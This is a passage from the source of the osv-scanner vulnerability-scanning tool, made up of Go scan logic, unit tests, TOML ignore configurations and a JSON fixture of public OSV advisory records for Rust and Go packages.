tt.wantErr) { t.Errorf("DoScan() error = %v, wantErr %v", err, tt.wantErr) return } snap := testutility.NewSnapshot() snap.MatchJSON(t, got) }) } } ================================================ FILE: pkg/osvscanner/scan.go ================================================ package osvscanner import ( "context" "errors" "fmt" "os" "path/filepath" "runtime" "slices" "strings" scalibr "github.com/google/osv-scalibr" cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto" "github.com/google/osv-scalibr/enricher" "github.com/google/osv-scalibr/enricher/packagedeprecation" "github.com/google/osv-scalibr/enricher/reachability/java" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/filesystem" "github.com/google/osv-scalibr/extractor/filesystem/simplefileapi" "github.com/google/osv-scalibr/fs" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/plugin" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/scalibrextract/filesystem/vendored" "github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitcommitdirect" "github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitrepo" "github.com/google/osv-scanner/v2/internal/scalibrplugin" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/pkg/osvscanner/internal/scanners" ) var ErrExtractorNotFound = errors.New("could not determine extractor suitable to this file") func logUnsafePlugins(plugins []plugin.Plugin) { for _, plug := range plugins { if plug.Requirements() != nil && plug.Requirements().AllowUnsafePlugins { cmdlogger.Warnf("Warning: plugin %s can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding.", plug.Name()) } } } func configurePlugins(plugins []plugin.Plugin, accessors ExternalAccessors, actions ScannerActions) { for _, plug := range plugins { vendored.Configure(plug, vendored.Config{ // Only attempt to vendor check git directories if we are not skipping scanning root git directories ScanGitDir: !actions.IncludeGitRoot, OSVClient: accessors.OSVDevClient, }) } } func getPlugins(defaultPlugins []string, accessors ExternalAccessors, actions ScannerActions) []plugin.Plugin { cfg := &cpb.PluginConfig{ UserAgent: actions.RequestUserAgent, PluginSpecific: []*cpb.PluginSpecificConfig{ { Config: &cpb.PluginSpecificConfig_PomXmlNet{ PomXmlNet: &cpb.POMXMLNetConfig{ UpstreamRegistry: actions.TransitiveScanning.MavenRegistry, DepsDevRequirements: !actions.TransitiveScanning.NativeDataSource, }, }, }, { Config: &cpb.PluginSpecificConfig_PythonRequirementsTransitive{ PythonRequirementsTransitive: &cpb.PythonRequirementsTransitiveConfig{ DepsDevRequirements: !actions.TransitiveScanning.NativeDataSource, }, }, }, }, } if !actions.PluginsNoDefaults { actions.PluginsEnabled = append(actions.PluginsEnabled, defaultPlugins...) } if !actions.TransitiveScanning.Disabled { actions.PluginsEnabled = append(actions.PluginsEnabled, "transitive") } if !actions.IncludeGitRoot { actions.PluginsDisabled = append(actions.PluginsDisabled, gitrepo.Name) } if accessors.OSVDevClient == nil { actions.PluginsDisabled = append(actions.PluginsDisabled, vendored.Name) } if actions.CallAnalysisStates["jar"] { actions.PluginsEnabled = append(actions.PluginsEnabled, java.Name) } if actions.FlagDeprecatedPackages { actions.PluginsEnabled = append(actions.PluginsEnabled, packagedeprecation.Name) } plugins := scalibrplugin.Resolve(actions.PluginsEnabled, actions.PluginsDisabled, cfg) configurePlugins(plugins, accessors, actions) return plugins } // countNotEnrichers counts the number of plugins that are not enricher.Enricher plugins func countNotEnrichers(plugins []plugin.Plugin) int { count := 0 for _, plug := range plugins { _, ok := plug.(enricher.Enricher) if !ok { count++ } } return count } // scan essentially converts ScannerActions into imodels.ScanResult by performing the extractions func scan(accessors ExternalAccessors, actions ScannerActions) (*inventory.Inventory, error) { var inv inventory.Inventory plugins := getPlugins( []string{"lockfile", "sbom", "directory"}, accessors, actions, ) // technically having one detector enabled would also be sufficient, but we're // not mentioning them to avoid confusion since they're still in their infancy if countNotEnrichers(plugins) == 0 { return nil, errors.New("at least one extractor must be enabled") } scanner := scalibr.New() // Build list of paths for each root // On linux this would return a map with just one entry of / rootMap := map[string][]string{} // Also build a map of specific plugin overrides that the user specify // map[path]parseAs overrideMap := map[string]filesystem.Extractor{} // List of specific paths the user passes in so that we can check that they all get processed. specificPaths := make([]string, 0, len(actions.LockfilePaths)+len(actions.SBOMPaths)) statsCollector := fileOpenedPrinter{ filesExtracted: make(map[string]struct{}), } // --- Directories --- for _, path := range actions.DirectoryPaths { cmdlogger.Infof("Scanning dir %s", path) if _, err := pathToRootMap(rootMap, path, actions.Recursive); err != nil { return nil, err } } // --- Lockfiles --- for _, lockfileElem := range actions.LockfilePaths { parseAs, path := scanners.ParseLockfilePath(lockfileElem) absPath, err := pathToRootMap(rootMap, path, actions.Recursive) if err != nil { return nil, err } specificPaths = append(specificPaths, absPath) if parseAs != "" { plug, err := scanners.ParseAsToPlugin(parseAs, plugins) if err != nil { return nil, err } overrideMap[absPath] = plug } } // --- SBOMs (Deprecated) --- // none of the SBOM extractors need configuring sbomExtractors := scalibrplugin.Resolve([]string{"sbom"}, []string{}, &cpb.PluginConfig{}) SBOMLoop: for _, sbomPath := range actions.SBOMPaths { absPath, err := pathToRootMap(rootMap, sbomPath, actions.Recursive) if err != nil { return nil, err } specificPaths = append(specificPaths, absPath) for _, se := range sbomExtractors { // All sbom extractors are filesystem extractors sbomExtractor := se.(filesystem.Extractor) if sbomExtractor.FileRequired(simplefileapi.New(absPath, nil)) { overrideMap[absPath] = sbomExtractor continue SBOMLoop } } cmdlogger.Errorf("Failed to parse SBOM %q: Invalid SBOM filename.", sbomPath) cmdlogger.Errorf("If you believe this is a valid SBOM, make sure the filename follows format per your SBOMs specification.") return nil, fmt.Errorf("invalid SBOM filename: %s", sbomPath) } // --- Add git commits directly --- gitDirectPlugin := gitcommitdirect.New(actions.GitCommits) if len(rootMap) == 0 && len(actions.GitCommits) > 0 { // Even if there's no actual paths, if we have git commits, still do the scan rootMap = map[string][]string{ "/": {}, } } testlogger.BeginDirScanMarker() osCapability := determineOS() // Parse exclude patterns (supports exact names, glob, and regex) excludePatterns, err := parseExcludePatterns(actions.ExcludePatterns) if err != nil { return nil, fmt.Errorf("failed to parse exclude patterns: %w", err) } capabilities := plugin.Capabilities{ DirectFS: true, RunningSystem: true, Network: plugin.NetworkOnline, OS: osCapability, AllowUnsafePlugins: true, } if actions.CompareOffline { capabilities.Network = plugin.NetworkOffline } filteredPlugins := append(plugin.FilterByCapabilities(plugins, &capabilities), gitDirectPlugin) logUnsafePlugins(filteredPlugins) // For each root, run scalibr's scan() once. for root, paths := range rootMap { sr := scanner.Scan(context.Background(), &scalibr.ScanConfig{ Plugins: filteredPlugins, Capabilities: &capabilities, ScanRoots: fs.RealFSScanRoots(root), PathsToExtract: paths, IgnoreSubDirs: !actions.Recursive, DirsToSkip: excludePatterns.dirsToSkip, SkipDirRegex: excludePatterns.regexPattern, SkipDirGlob: excludePatterns.globPattern, UseGitignore: !actions.NoIgnore, Stats: &statsCollector, ReadSymlinks: false, MaxInodes: 0, StoreAbsolutePath: true, PrintDurationAnalysis: false, ErrorOnFSErrors: false, ExplicitPlugins: true, ExtractorOverride: func(api filesystem.FileAPI) []filesystem.Extractor { ext, ok := overrideMap[filepath.Join(root, filepath.FromSlash(api.Path()))] if ok { return []filesystem.Extractor{ext} } return []filesystem.Extractor{} }, }) // --- Check status of the run --- if sr.Status.Status == plugin.ScanStatusFailed { return nil, errors.New(sr.Status.FailureReason) } for _, status := range sr.PluginStatus { if status.Status.Status != plugin.ScanStatusSucceeded { builder := strings.Builder{} criticalError := false for _, fileError := range status.Status.FileErrors { if len(status.Status.FileErrors) > 1 { // If there is more than 1 file error, write them on new lines builder.WriteString("\n\t") } fmt.Fprintf(&builder, "%s: %s", fileError.FilePath, fileError.ErrorMessage) // Check if the erroring file was a path specifically passed in (not a result of a file walk) if slices.Contains(specificPaths, filepath.Join(root, fileError.FilePath)) { criticalError = true } } msg := status.Status.FailureReason if len(status.Status.FileErrors) > 0 { msg = builder.String() } cmdlogger.Errorf("Error during extraction: (extracting as %s) %s", status.Name, msg) if criticalError { return nil, errors.New("extraction failed on specified lockfile") } } } slices.SortFunc(sr.Inventory.Packages, inventorySort) invsCompact := slices.CompactFunc(sr.Inventory.Packages, func(a, b *extractor.Package) bool { return inventorySort(a, b) == 0 }) sr.Inventory.Packages = invsCompact inv.GenericFindings = append(inv.GenericFindings, sr.Inventory.GenericFindings...) inv.Packages = append(inv.Packages, sr.Inventory.Packages...) } testlogger.EndDirScanMarker() // Check if specific paths have been extracted. // This allows us to error if a specific file provided by the user failed to extract, and return an error for them. for _, path := range specificPaths { if _, ok := statsCollector.filesExtracted[path]; !ok { return nil, fmt.Errorf("%w: %q", ErrExtractorNotFound, path) } } if len(inv.Packages) == 0 { return nil, ErrNoPackagesFound } return &inv, nil } // pathToRootMap saves the absolute path into the root map, and returns the absolute path. // path is only saved if it does not fall under an existing path. // IMPORTANT: it does not remove existing paths already added to the rootMap, so add directories before specific files. func pathToRootMap(rootMap map[string][]string, path string, recursive bool) (string, error) { absPath, err := filepath.Abs(path) if err != nil { return "", err } fi, err := os.Stat(absPath) if err != nil { return "", fmt.Errorf("failed to resolve path: %w", err) } root := getRootDir(absPath) // If path is a directory and we are not recursively scanning, then always add it as a target. if fi.IsDir() && !recursive { rootMap[root] = append(rootMap[root], absPath) return absPath, nil } // Otherwise, only add if it's not a descendent of an existing path for _, existing := range rootMap[root] { if isDescendent(existing, absPath, recursive) { return absPath, nil } } rootMap[root] = append(rootMap[root], absPath) return absPath, nil } // isDescendent returns whether `path` is either a descendent or a direct child of `potentialParent` // recursive = true: checks for descendents // recursive = false: checks for direct children func isDescendent(potentialParent, path string, recursive bool) bool { rel, err := filepath.Rel(potentialParent, path) if err != nil { // This should never happen return false } if rel == "." { // Same as an existing path, skip return true } if strings.HasPrefix(rel, "..") { return false } depths := len(strings.Split(rel, string(filepath.Separator))) if recursive { // Descendant of existing dir, and we are recursively scanning, so skip return true } if depths == 1 { // Direct child of existing dir, skip return true } return false } // getRootDir returns the root directory on each system. // On Unix systems, it'll be / // On Windows, it will most likely be the drive (e.g. C:\) func getRootDir(path string) string { if runtime.GOOS == "windows" { return filepath.VolumeName(path) + "\\" } if strings.HasPrefix(path, "/") { return "/" } return "" } func determineOS() plugin.OS { switch runtime.GOOS { case "windows": return plugin.OSWindows case "darwin": return plugin.OSMac case "linux": return plugin.OSLinux default: cmdlogger.Warnf("Unknown OS \"%s\" - results might be inaccurate", runtime.GOOS) return plugin.OSAny } } ================================================ FILE: pkg/osvscanner/scan_test.go ================================================ package osvscanner import ( "path/filepath" "testing" ) func Test_isDescendent(t *testing.T) { t.Parallel() tests := []struct { name string potentialParent string path string recursive bool want bool }{ { name: "same_path", potentialParent: "/a/b", path: "/a/b", recursive: true, want: true, }, { name: "direct_child,_recursive", potentialParent: "/a/b", path: "/a/b/c", recursive: true, want: true, }, { name: "direct_child,_non-recursive", potentialParent: "/a/b", path: "/a/b/c", recursive: false, want: true, }, { name: "grandchild,_recursive", potentialParent: "/a/b", path: "/a/b/c/d", recursive: true, want: true, }, { name: "grandchild,_non-recursive", potentialParent: "/a/b", path: "/a/b/c/d", recursive: false, want: false, }, { name: "not_a_descendent", potentialParent: "/a/b", path: "/a/c", recursive: true, want: false, }, { name: "different_root", potentialParent: "/a/b", path: "/x/y", recursive: true, want: false, }, { name: "relative_path,_direct_child,_recursive", potentialParent: "a/b", path: "a/b/c", recursive: true, want: true, }, { name: "relative_path,_grandchild,_non-recursive", potentialParent: "a/b", path: "a/b/c/d", recursive: false, want: false, }, { name: "relative_path,_not_a_descendent", potentialParent: "a/b", path: "a/c", recursive: true, want: false, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() // Normalize paths for the current OS potentialParent := filepath.FromSlash(tt.potentialParent) path := filepath.FromSlash(tt.path) if got := isDescendent(potentialParent, path, tt.recursive); got != tt.want { t.Errorf("isDescendent(%q, %q, %v) = %v, want %v", tt.potentialParent, tt.path, tt.recursive, got, tt.want) } }) } } ================================================ FILE: pkg/osvscanner/stats.go ================================================ package osvscanner import ( "path/filepath" "github.com/google/osv-scalibr/stats" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/output" ) type fileOpenedPrinter struct { stats.NoopCollector filesExtracted map[string]struct{} } var _ stats.Collector = &fileOpenedPrinter{} func (c *fileOpenedPrinter) AfterExtractorRun(_ string, extractorstats *stats.AfterExtractorStats) { if c.filesExtracted == nil { c.filesExtracted = make(map[string]struct{}) } systemPath := filepath.Join(extractorstats.Root, filepath.FromSlash(extractorstats.Path)) c.filesExtracted[systemPath] = struct{}{} if extractorstats.Error != nil { // Don't log scanned if error occurred return } pkgsFound := len(extractorstats.Inventory.Packages) cmdlogger.Infof( "Scanned %s file and found %d %s", systemPath, pkgsFound, output.Form(pkgsFound, "package", "packages"), ) } ================================================ FILE: pkg/osvscanner/testdata/filter/.gitignore ================================================ out.json ================================================ FILE: pkg/osvscanner/testdata/filter/all/configs/a/osv-scanner.toml ================================================ # An entry for every vulnerability (including aliases) [[IgnoredVulns]] id = "GHSA-mc8h-8q98-g5hr" reason = "Ignore 1" # Alias of RUSTSEC-2023-0018 [[IgnoredVulns]] id = "RUSTSEC-2023-0018" reason = "Redundant Ignore 1" # Redundant ignore statement - Alias of GHSA-mc8h-8q98-g5hr [[IgnoredVulns]] id = "GHSA-wcg3-cvx6-7396" reason = "Ignore 2" # Alias of RUSTSEC-2020-0071 [[IgnoredVulns]] id = "RUSTSEC-2020-0071" reason = "Redundant Ignore 2" # Redundant ignore statement - Alias of GHSA-wcg3-cvx6-7396 ================================================ FILE: pkg/osvscanner/testdata/filter/all/configs/b/osv-scanner.toml ================================================ # One entry for each vulnerability group [[IgnoredVulns]] id = "GHSA-fxg5-wq6x-vr4w" reason = "Ignore 1" # Alias of GO-2023-1495 [[IgnoredVulns]] id = "GO-2022-1144" reason = "Ignore 2" # Alias of GHSA-xrjj-mj9h-534m [[IgnoredVulns]] id = "CVE-2022-41723" reason = "Ignore 3" # Alias of GHSA-vvpx-j8f3-3w6h and GO-2023-1571 ================================================ FILE: pkg/osvscanner/testdata/filter/all/configs/c/osv-scanner.toml ================================================ # One entry for each vulnerability group [[IgnoredVulns]] id = "GHSA-mc8h-8q98-g5hr" reason = "Ignore 1" # Alias of RUSTSEC-2023-0018 [[IgnoredVulns]] id = "RUSTSEC-2020-0071" reason = "Ignore 2" # Alias of GHSA-wcg3-cvx6-7396 [[IgnoredVulns]] id = "RUSTSEC-2023-0015" reason = "Ignore 3" # No aliases [[IgnoredVulns]] id = "GHSA-mrrw-grhq-86gf" reason = "Ignore 4" # No aliases ================================================ FILE: pkg/osvscanner/testdata/filter/all/input.json ================================================ { "results": [ { "source": { "path": "testdata/filter/all/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "aliases": null, "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] }, { "source": { "path": "testdata/filter/all/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-fxg5-wq6x-vr4w", "modified": "2023-01-24T18:56:46Z", "published": "2023-01-14T00:30:23Z", "aliases": [ "CVE-2022-41721" ], "summary": "golang.org/x/net/http2/h2c vulnerable to request smuggling attack", "details": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net/http2/h2c", "purl": "pkg:golang/golang.org/x/net/http2/h2c" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721" }, { "type": "PACKAGE", "url": "https://cs.opensource.google/go/x/net" }, { "type": "WEB", "url": "https://go.dev/cl/447396" }, { "type": "WEB", "url": "https://go.dev/issue/56352" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1495" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2023-01-20T22:40:06Z", "nvd_published_at": "2023-01-13T23:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.4.0", "id": "GO-2023-1495", "modified": "2023-01-31T21:39:17Z", "published": "2023-01-13T22:39:40Z", "aliases": [ "CVE-2022-41721", "GHSA-fxg5-wq6x-vr4w" ], "summary": "", "details": "A request smuggling attack is possible when using MaxBytesHandler.\n\nWhen using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": 